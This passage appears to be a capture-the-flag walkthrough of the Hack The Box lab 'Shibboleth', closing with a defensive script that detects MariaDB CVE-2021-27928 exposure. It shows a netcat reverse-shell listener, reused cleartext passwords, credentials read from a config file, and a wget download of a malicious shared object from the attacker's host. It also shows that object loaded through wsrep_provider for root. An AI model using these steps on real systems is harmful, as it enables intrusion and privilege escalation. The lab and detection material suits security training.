Hmmm, only one TCP port is open, which is strange. Let's try scanning UDP ports.

```
└─$ nmap -vvv -T4 -sU shibboleth.htb
Increasing send delay for 10.129.98.77 from 0 to 50 due to 11 out of 17 dropped probes since last increase.
Warning: 10.129.98.77 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.129.98.77 from 200 to 400 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.129.98.77 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for shibboleth.htb (10.129.98.77)
Host is up, received echo-reply ttl 63 (0.21s latency).
Scanned at 2021-11-14 00:50:23 EST for 1076s
Not shown: 993 closed ports
Reason: 993 port-unreaches
PORT      STATE         SERVICE  REASON
623/udp   open          asf-rmcp udp-response ttl 63
5555/udp  open|filtered rplay    no-response
8000/udp  open|filtered irdmi    no-response
21167/udp open|filtered unknown  no-response
30718/udp open|filtered unknown  no-response
49175/udp open|filtered unknown  no-response
49350/udp open|filtered unknown  no-response
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Nov 14 01:08:19 2021 -- 1 IP address (1 host up) scanned in 1075.67 seconds
```

And yes, there are some UDP ports open.
Zabbix is an open-source monitoring tool for diverse IT components, including networks, servers, virtual machines and cloud services. It provides monitoring metrics such as network utilization, CPU load and disk space consumption.
Get login details
I tried some web attacks to log in, but none of them worked. UDP port 623 (IPMI) will get us some hashes instead.
Learn
UDP port 623 (IPMI) is vulnerable: https://book.hacktricks.xyz/pentesting/623-udp-ipmi
Login creds
I used the Metasploit module to get the hashes because it was easy.

```
└─$ nc -nvlp 9002
listening on [any] 9002 ...
connect to [10.10.14.47] from (UNKNOWN) [10.129.99.116] 40614
sh: 0: can't access tty; job control turned off
$ whoami
zabbix
```

As no SSH port is open, we can't get a stable shell, so let's work with this one.
Get user flag / escalating user privileges

```
# Use the zabbix login creds to switch to the ipmi-svc user
zabbix@shibboleth$ su ipmi-svc
password: ilovepumkinpie1
ipmi-svc@shibboleth$ cat /home/ipmi-svc/user.txt
<--SNIP-->
```

The DB credentials are stored in /etc/zabbix/zabbix_server.conf.

```
ipmi-svc@shibboleth:/etc$ cat /etc/zabbix/zabbix_server.conf | grep -C2 -i "password"
DBUser=zabbix

### Option: DBPassword
#	Database password.
#	Comment this line if no password is used.
#
# Mandatory: no
# Default:
DBPassword=bloooarskybluh
```

Now we have the DB username and password [ zabbix : bloooarskybluh ].
MySQL enumeration
As the ipmi-svc user is not in the sudoers list, GTFOBins is not helpful here.

```
ipmi-svc@shibboleth:/etc$ mysql -V
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
```

So the MariaDB version is 10.3.25.
Link : https://www.cvedetails.com/vulnerability-list/vendor_id-12010/Mariadb.html
The first CVE on that list has a 9.0 score [ CVE-2021-27928 ].

Let's get root
Link : https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html
I used a Python HTTP server and wget to transfer the payload.

```
python3 -m http.server 80            # [ Attacker ]
wget http://<your_ip>/root.so        # [ Victim ]
```

Set up a nc listener

```
# Log in with the creds we got earlier
ipmi-svc@shibboleth:~$ mysql -u zabbix -pbloooarskybluh -h localhost -e 'SET GLOBAL wsrep_provider="/tmp/root.so";'
ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query
```
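From the defender's side, the two things worth checking on a host like this are whether the installed MariaDB build falls below the fixed release for CVE-2021-27928, and whether wsrep_provider has been pointed at a shared object outside the normal Galera library directory. The script below is an added example, not part of the writeup; the fixed releases are the ones listed in the CVE advisory, and the trusted Galera directories are an assumption about typical distro paths.

```python
import re

# Fixed releases from the CVE-2021-27928 advisory, keyed by MariaDB branch.
FIXED_RELEASES = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}

# Matches the Distrib field printed by `mysql -V` on a MariaDB client.
BANNER_RE = re.compile(r"Distrib\s+(\d+)\.(\d+)\.(\d+)-MariaDB")

# Assumption: where a legitimate Galera provider library normally lives.
TRUSTED_PROVIDER_DIRS = ("/usr/lib/galera/", "/usr/lib64/galera/")


def parse_mariadb_version(banner):
    """Return (major, minor, patch) from a client banner, or None if not MariaDB."""
    m = BANNER_RE.search(banner)
    return tuple(int(g) for g in m.groups()) if m else None


def affected_by_cve_2021_27928(version):
    """True when `version` is in an affected branch and below its fixed release.
    Branches the advisory does not list (10.1 and earlier, 10.6+) return False."""
    branch = version[:2]
    return branch in FIXED_RELEASES and version < FIXED_RELEASES[branch]


def suspicious_wsrep_provider(value):
    """Flag a wsrep_provider value that is neither unset ('none') nor a library
    under a trusted Galera directory, e.g. a shared object dropped in /tmp."""
    if value.strip().lower() in ("", "none"):
        return False
    return not value.startswith(TRUSTED_PROVIDER_DIRS)


if __name__ == "__main__":
    # Constructed sample: the banner from the writeup plus three provider values.
    banner = "mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2"
    version = parse_mariadb_version(banner)
    print(version, "affected:", affected_by_cve_2021_27928(version))
    for value in ("none", "/usr/lib/galera/libgalera_smm.so", "/tmp/root.so"):
        print(value, "suspicious:", suspicious_wsrep_provider(value))
```

The provider value to feed `suspicious_wsrep_provider` is what `SHOW GLOBAL VARIABLES LIKE 'wsrep_provider'` returns on the server being audited.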